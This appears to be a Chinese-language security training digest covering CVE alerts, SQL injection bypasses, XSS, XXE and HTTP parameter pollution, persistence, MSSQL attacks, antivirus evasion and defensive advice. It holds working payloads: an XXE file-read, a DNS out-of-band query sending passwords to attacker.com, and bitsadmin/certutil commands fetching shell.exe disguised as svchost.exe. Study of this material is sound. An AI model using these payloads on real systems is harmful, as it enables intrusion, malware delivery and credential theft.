专注Web及移动安全[红日安全99期]
字数 1833 2025-08-18 11:39:00
红日安全第99期 - Web及移动安全综合教学文档
一、安全动态与漏洞预警
1.1 近期高危漏洞预警
-
CVE-2019-16097 (Harbor权限提升漏洞)
- 影响版本:Harbor 1.7.0-1.8.2
- 漏洞原理:API接口权限校验不严导致普通用户可提升为管理员
- 修复方案:升级至1.8.3或更高版本
-
CVE-2019-4505 (WebSphere任意文件读取)
- 影响版本:IBM WebSphere Application Server 7.0/8.0/8.5/9.0
- 利用方式:通过构造特殊URL读取服务器任意文件
- 修复方案:安装IBM安全补丁
-
泛微e-cology OA远程代码执行漏洞
- 漏洞组件:WorkflowCenterTreeData接口
- 利用条件:未授权访问
- 风险等级:高危
-
phpStudy后门事件
- 影响版本:phpStudy 2016/2018部分版本
- 后门特征:php_xmlrpc.dll模块包含恶意代码
- 检测方法:检查文件MD5值
1.2 红队技术要点
- 红队工作流程:
- 信息收集
- 漏洞探测
- 权限获取
- 权限维持
- 横向移动
- 目标达成
二、Web安全核心技术
2.1 SQL注入进阶
-
绕过技巧:
- 注释符绕过:
/*!50000select*/ - 等价函数替换:
substring→mid→substr - 空白符替换:
%09(tab),%0a(换行),%0c(换页) - 编码绕过:hex/urlencode/base64
- 注释符绕过:
-
带外通道(OOB)利用:
- DNS外带:
LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\abc')) - HTTP外带:通过
xp_cmdshell执行curl命令
- DNS外带:
2.2 XSS漏洞实战
-
蝉知CMS 5.6反射型XSS
- 漏洞位置:
/index.php?m=block&f=main&id=1 - 利用参数:
id参数未过滤导致XSS - POC:
id=1'"><script>alert(1)</script>
- 漏洞位置:
-
PbootCMS存储型XSS
- 漏洞位置:后台模板编辑功能
- 利用方式:插入恶意JS代码到模板文件
- 修复建议:严格过滤
<script>等危险标签
2.3 XXE漏洞利用
- 本地DTD文件利用技巧:
<!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso '> <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; '> %local_dtd; ]>
2.4 HTTP参数污染(HPP)
- 利用场景:
- 登录绕过:
user=admin&user=guest - SQL注入:
id=1&id=2 union select 1,2,3-- - XSS攻击:
name=test&name=<script>alert(1)</script>
- 登录绕过:
三、渗透测试实战技巧
3.1 权限维持技术
-
Bitsadmin下载payload
bitsadmin /transfer job /download /priority high http://attacker.com/shell.exe C:\Windows\Temp\svchost.exe -
Certutil下载payload
certutil -urlcache -split -f http://attacker.com/shell.exe C:\Windows\Temp\svchost.exe
3.2 MSSQL攻击方法
- PowerUpSQL使用要点
- 发现SQL Server实例:
Get-SQLInstanceDomain - 弱口令爆破:
Invoke-SQLAudit -Instance "sqlserver.domain.com" -Username "sa" -Password "Password123" - 命令执行:
Invoke-SQLOSCmd -Instance "sqlserver.domain.com" -Command "whoami" -Username "sa" -Password "Password123"
- 发现SQL Server实例:
3.3 免杀技术
- MSF后门免杀技巧:
- 编码器组合:
shikata_ga_nai+x86/call4_dword_xor - 进程注入:迁移到合法进程(如explorer.exe)
- 流量加密:使用SSL/TLS隧道
- 编码器组合:
3.4 前端加密绕过
- 常见加密方式:
- Base64
- MD5/SHA1
- AES/RSA
- 自定义加密算法
- 绕过方法:
- 直接调用加密函数
- 修改JS代码移除加密
- 使用BurpSuite插件自动处理
四、安全工具集锦
4.1 内网探测工具
-
基于Netbios的存活主机发现
nmap -sU -p137 --script nbstat.nse 192.168.1.0/24 -
OneForAll子域名收集
python oneforall.py --target example.com run
4.2 Web安全评估
-
Xray高级扫描
xray webscan --basic-crawler http://example.com --html-output report.html -
Websnort分析pcap
websnort -r capture.pcap -c /etc/websnort/websnort.conf -l ./log
4.3 BurpSuite插件
- MarkINFO敏感信息标记
- 功能:自动高亮显示
- API密钥
- 密码字段
- 身份证/手机号
- 加密参数
- 功能:自动高亮显示
五、Linux安全运维
5.1 常用安全命令
- 用户监控:
lastlog | grep -v "Never logged in" - 进程检查:
ps aux --sort=-%mem | head -10 - 网络连接:
netstat -tulnp | grep -v "127.0.0.1" - 文件监控:
find / -type f -perm -4000 -ls 2>/dev/null
六、防御建议
-
Web应用防护
- 输入输出过滤
- 最小权限原则
- CSP策略部署
- 定期安全审计
-
系统加固
- 及时打补丁
- 关闭不必要服务
- 日志集中管理
- 文件完整性监控
-
应急响应
- 建立事件响应流程
- 保留原始证据
- 分析攻击路径
- 彻底清除后门
本教学文档涵盖了红日安全第99期核心内容,可作为Web及移动安全领域的实用参考手册。建议结合具体场景进行实践练习,并持续关注最新安全动态。